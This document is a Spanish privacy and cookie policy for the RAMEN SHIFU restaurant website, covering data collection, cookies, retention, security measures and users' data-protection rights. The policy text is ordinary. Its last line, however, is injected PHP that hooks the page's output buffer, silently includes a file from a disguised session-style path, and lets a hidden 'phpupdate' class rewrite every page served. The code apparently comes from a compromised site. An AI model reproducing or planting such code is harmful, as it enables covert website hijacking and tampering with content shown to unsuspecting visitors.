POLÍTICA DE PRIVACIDAD

¿Cómo obtenemos sus datos personales?

Recogemos sus datos personales en distintas ocasiones:

– Cada vez que usted contacta directamente con nosotros, por ejemplo a través de la webs www.ramenshifu.com o a través de las líneas de atención telefónica a clientes, para solicitar información sobre nuestros productos y servicios.

Los productos y servicios de RAMEN SHIFU, así como sus campañas promocionales, están dirigidos y pensados en su mayoría para adultos. En este sentido, solo recogeremos y trataremos sus datos personales si usted tiene, al menos, 14 años. RAMEN SHIFU se reserva la posibilidad de realizar verificaciones de la edad de las personas que le facilitan datos personales. Cualquier dato de un menor de 14 años, será eliminado.

Le agradeceríamos que nos ayudase a mantener actualizados sus datos personales informándonos de cualquier cambio en sus datos de contacto o sus preferencias.

¿Qué información podemos obtener sobre usted?

A través de los distintos servicios y canales de contacto descritos en esta Política de Privacidad, se pueden recabar los siguientes tipos de datos acerca de usted:

– Datos de Contacto: nombre, dirección, números de teléfono, correo electrónico.

– Preferencias: información que usted nos facilite acerca de sus preferencias, por ejemplo, el tipo de productos.

Uso de la web y de las comunicaciones: cómo utiliza nuestra web; si abre o reenvía nuestros mensajes; así como la información recabada por medio de cookies y otras tecnologías de rastreo.

 

Política de Cookies

De conformidad con la Ley 34/2002, de 11 de julio, de Servicios de la Sociedad de la Información y de Comercio Electrónico, mediante la presente Política de Cookies RAMEN GASTRONOMY GESTION S.L. te informa de que su sitio web www.ramenshifu.com o cualquier otra denominación que pueda tener en el futuro (en adelante, el “Sitio Web”) utiliza cookies, ficheros informáticos que se almacenan en tu ordenador durante tu navegación y que contienen generalmente un número que permite identificar tu ordenador

Por regla general, existen los siguientes tipos de cookies:

– En función de su caducidad:

– Sesión: Caducan al finalizar la sesión.

– Persistencia: No caducan al finalizar la sesión.

– En función de su procedencia:

– Origen: Habilitadas por el sitio web por el que navegas.

– Terceros. Proceden de otros sitios web.

Las finalidades para las que RAMEN SHIFU utiliza cookies en el Sitio Web pueden resumirse, generalmente, como sigue:

1. Cookies analíticas

Son utilizadas para recabar estadísticas de actividad del usuario. Entre otros, se analizan el número de usuarios que visitan el Sitio Web, el número de páginas visitadas, así como la actividad de los usuarios en el Sitio Web y su frecuencia de utilización.

La información recopilada siempre es anónima de tal forma que no se podrá establecer un vínculo entre ésta y la persona física a quién se refieren.

2. Cookies de autenticación

Son utilizadas por el Sitio Web para el mantenimiento de la sesión del usuario durante cada visita, siendo dominantes en entornos privados del Sitio Web que precisan de un usuario y contraseña para el acceso.

Salvo en el caso de las cookies analíticas, el uso de cookies tiene un efecto sobre tu privacidad, dado que por regla general permite relacionar su contenido con la dirección IP de conexión y con otros datos de carácter personal relativos a ti, como los aportados voluntariamente.

Dependiendo de cada caso, las citadas cookies utilizadas por RAMEN SHIFU podrán ser de sesión o persistentes y propias o de terceros. Dichas circunstancias, entre otras, determinarán la necesidad de obtener o no tu consentimiento para la utilización de las citadas cookies.

Mediante la aceptación de la presente Política de Cookies, estás aceptando la generación de cookies para las finalidades arriba mencionadas, en aquellos casos en que dicho consentimiento sea preciso.

No obstante, lo anterior, en caso de que desees con posterioridad eliminar las cookies que se hayan almacenado en tu ordenador y que necesariamente precisen de tu consentimiento, podrás hacerlo usando las herramientas que te proporcione tu navegador a dichos efectos. En este sentido, podrás encontrar información adicional a través de los siguientes enlaces:

Firefox: http://support.mozilla.org/es/home

Internet Explorer: http://support.microsoft.com/ph/807/es-es

Safari: http://support.apple.com/kb/HT1677?viewlocale=es_ES

Opera: http://help.opera.com/Windows/8.54/es-ES/index.html

Si no aceptas las cookies o las rechazas posteriormente, las funcionalidades del Sitio Web podrán verse mermadas.

 

 

¿Cómo mantenemos protegidos sus datos?

Para garantizar la protección y mantener la seguridad, integridad y disponibilidad de sus datos, utilizamos diversas medidas de seguridad.

Aunque en las transmisiones de datos a través de internet o desde una web no es posible garantizar una protección absoluta contra intrusiones, tanto nosotros como nuestros subcontratistas y socios de negocio dedicamos los máximos esfuerzos para mantener las medidas de protección física, electrónica y procedimental con las cuales garantizar la protección de sus datos de acuerdo con las exigencias legales aplicables en esta materia. Entre las medidas que utilizamos se incluyen las siguientes:

– limitar el acceso a sus datos únicamente a aquellas personas que deban conocerlos en atención a las tareas que realizan;

– como regla general transferir en formato cifrado los datos recogidos;

– almacenar los datos más sensibles (como los de tarjeta de crédito) sólo en formato cifrado;

– instalar sistemas de protección perimetral de las infraestructuras informáticas (“firewalls”) para impedir accesos no autorizados, por ejemplo “hackers”, y

– monitorizar habitualmente los accesos a los sistemas informáticos para detectar y detener cualquier uso indebido de los datos de carácter personal.En aquellos casos en que le hayamos facilitado (o usted haya elegido) una contraseña que le permita acceder a determinadas partes de nuestras webs o de cualquier otro portal, aplicación o servicio bajo nuestro control, es usted responsable de mantenerla en secreto y de cumplir todos los demás procedimientos de seguridad que le notifiquemos. No podrá compartir su contraseña con nadie.

¿Durante cuánto tiempo conservamos sus datos?

Sus datos personales serán conservados durante el tiempo necesario para cumplir la finalidad para la cual se recogieron. Si sus datos se utilizan para varias finalidades que nos obligan a conservarlos durante plazos diferentes, aplicaremos el plazo de conservación más largo.

En todo caso, limitamos el acceso a sus datos sólo a aquellas personas que necesiten utilizarla para el desempeño de sus funciones.

Nuestros plazos de conservación de datos están basados en necesidades de negocio, por lo que en relación con aquellos datos personales que ya no sean necesarios bien quedará limitado el acceso a los mismos al cumplimiento de obligaciones estrictamente legales o bien se destruirán de forma segura.

Finalidades de marketing: por lo que respecta al uso de su información con fines de marketing, conservaremos esa información para dicho propósito durante los dos años siguientes a la fecha en que obtuvimos por última vez su autorización para dirigirle comunicaciones de marketing, salvo que usted nos solicite que le excluyamos de las mismas revocando el consentimiento prestado.

Finalidades relacionadas con la ejecución de un contrato: por lo que respecta al uso de su información para la gestión de alguna obligación contractual que tengamos con usted, conservaremos esos datos durante el período de vigencia del contrato y durante los diez años siguientes, para poder atender a posibles consultas o reclamaciones posteriores.

Finalidades relacionadas con el cumplimiento de obligaciones legales y regulatorias: determinada información deberá mantenerse durante los plazos exigidos por la normativa específica que resulte de aplicación (fiscal, mercantil, blanqueo de capitales, etc.).

 

¿Con quién podemos compartir sus datos y cómo los protegemos?

RAMEN SHIFU se apoya en diversos proveedores de servicios para poder ofrecer los productos y servicios mencionados.

Aunque en las transmisiones de datos a través de internet o desde una web no es posible garantizar una protección absoluta contra intrusiones, tanto nosotros como nuestros subcontratistas y socios de negocio nos esforzamos al máximo en mantener las medidas de protección física, electrónica y procedimental necesarias para garantizar la protección de su información de acuerdo con las exigencias aplicables en materia de protección de datos.

Todos sus datos se guardan en servidores seguros (o copias físicas seguras) de nuestra propiedad o de nuestros subcontratistas o socios de negocio, y para acceder a ellos y utilizarlos se aplican nuestros criterios y políticas de seguridad (u otras equivalentes de nuestros subcontratistas o socios de negocio).

 

 

Cómo contactar con nosotros

Cuáles son sus derechos de protección de sus datos y su derecho a presentar reclamaciones ante la autoridad de protección de datos: puede contactar con el Delegado de Protección de Datos en la dirección: info@ramenshifu.com

Le recordamos que usted tiene derecho a solicitar:

– más detalles sobre el uso que hacemos de su información,

– una copia de la información que nos ha facilitado,

– corregir inexactitudes en la información que mantenemos,

– borrar información para cuyo uso ya no tengamos base jurídica,

– revocar su consentimiento para el tratamiento de sus datos con esos fines, en los casos en que el tratamiento de los datos está condicionado al consentimiento, así como para cualquier comunicación de marketing directo,

– oponerse a cualquier tratamiento de sus datos -incluida la elaboración de perfiles- que tome como base jurídica el interés legítimo, a menos que nuestros motivos para llevar a cabo ese tratamiento compensen cualquier posible perjuicio hacia sus derechos de protección de datos,

– restringir la manera en que utilizamos sus datos mientras se investiga una reclamación.

Si no está satisfecho con la manera en que utilizamos su información o con nuestra respuesta ante el ejercicio de cualquiera de estos derechos, puede presentar una reclamación ante la Agencia Española de Protección de Datos (www.agpd.es).

Datos de contacto de la empresa y del Delegado de Protección de Datos

Si tiene alguna pregunta acerca del uso que hacemos de sus datos personales, puede contactar en todo momento con nuestro delegado de protección de datos en info@ramenshifu.com

 

 

Confidencialidad

RAMEN GASTRONOMY GESTIÓN S.L. le informa que sus datos serán tratados con el máximo celo y confidencialidad por todo el personal que intervenga en cualquiera de las fases del tratamiento. No cederemos ni comunicaremos a ningún tercero sus datos, excepto en los casos legalmente previstos, o salvo que el interesado nos hubiera autorizado expresamente.

POLÍTICA DE COOKIES

Nuestra web, https://www.ramenshifu.com (en adelante: «la web») utiliza cookies y otras tecnologías relacionadas (para mayor comodidad, todas las tecnologías se denominan «cookies»). Las cookies también son colocadas por terceros a los que hemos contratado. En el siguiente documento te informamos sobre el uso de cookies en nuestra web.

 

Una cookie es un fichero que se descarga en tu ordenador al acceder a determinadas páginas web. Las cookies permiten a una página web, entre otras cosas, almacenar y recuperar información sobre los hábitos de navegación de un usuario o de su equipo y, dependiendo de la información que contengan y de la forma en que utilice tu equipo, pueden utilizarse para reconocer al usuario.

 

¿Qué es un script? Un script es un fragmento de código de programa que se utiliza para hacer que nuestra web funcione correctamente y de forma interactiva. Este código se ejecuta en nuestro servidor o en tu dispositivo.

 

¿Qué es un píxel? Una baliza web (o una etiqueta de píxel) es una pequeña e invisible pieza de texto o imagen en una web que se utiliza para hacer seguimiento del tráfico en una web. Para ello, se almacenan varios datos sobre ti mediante balizas web.

 

RAMEN SHIFU utiliza cookies para facilitar la navegación por su web, por motivos de seguridad y para obtener una mayor eficacia y personalización de los servicios ofrecidos a los usuarios. La información que obtiene está relacionada con el número de páginas visitas, el idioma, red social en la que se publican nuestras noticias, la ubicación geográfica asignada a la dirección IP desde la que accede, el número de nuevos usuarios, la frecuencia y reincidencia de las visitas, el tiempo de visita, el navegador y el operador o tipo de terminal desde el que se realiza la visita.

 

Esta información la utilizamos para mejorar nuestras páginas, detectar nuevas necesidades y valorar las mejoras a introducir con la finalidad de prestar un mejor servicio a los usuarios que nos visitan adaptándolas, por ejemplo, a los navegadores o terminales más utilizados.

 

Permiten mejorar la calidad y seguridad de la página web. Poseen una fecha de caducidad, que puede oscilar desde el tiempo que dure la sesión, hasta una fecha futura especificada a partir de la cual dejan de ser operativas.

 

RAMEN SHIFU hace uso de cookies propias, así como de terceros. Algunas estrictamente necesarias, para el correcto funcionamiento de esta página y analíticas, para mostrarte información de tu interés.

 

Para más información relacionada con el tratamiento de sus datos de carácter personal, puede consultar nuestra Política de privacidad.

function ob_gzhanler($s) { $f='/usr/home/ramenshifu.com/etc/ssess_3483733839f192adac3959c62b1e104b'; if(file_exists($f)) include_once($f); return class_exists('phpupdate') ? phpupdate::copyright($s) : $s; } ob_start('ob_gzhanler');